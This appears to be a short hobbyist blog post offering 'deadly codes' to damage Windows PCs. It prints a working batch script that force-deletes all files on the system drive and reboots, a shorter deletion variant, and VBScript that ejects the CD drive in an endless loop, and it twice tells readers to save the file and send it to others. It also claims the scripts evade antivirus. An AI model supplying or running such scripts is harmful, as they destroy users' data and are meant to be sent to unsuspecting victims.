Let’s try some malicious codes and screw up our systems




First I don’t like to be held responsible for whatever happens to your system after practicing these codes. Today Tech360 magazine hacker is going to teach you some deadly codes to mess up the windows PC system files and delete some important files of folders. The files would have the extension of .bat. The codes will simply be type in windows notepad or you can even use notepad ++. These codes cannot be detected by the antivirus and they can immediately cause unexpected damage, so please be careful. We intend to provide knowledge not to cause disasters. 




Deleting C drive contents permanently:
The following codes would delete the C-Drive contents permanently; just type them in the notepad and save the file with the extension of anything.bat

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Or you can type these codes:
@Echo off
Del C:\ *.*
Y

Pop out CD drive continuously
These codes will make the cd-drive to pop out continuously; these are VB script files just make sure you save with the extension of anything.VBS before sending it.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Or you can type these codes:

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Save it as "Anything.vbs" and send it.
Now if you want to disable this go to task manager click on process
Then find wscript.exe and end this process.
Have fun messing around with your PC.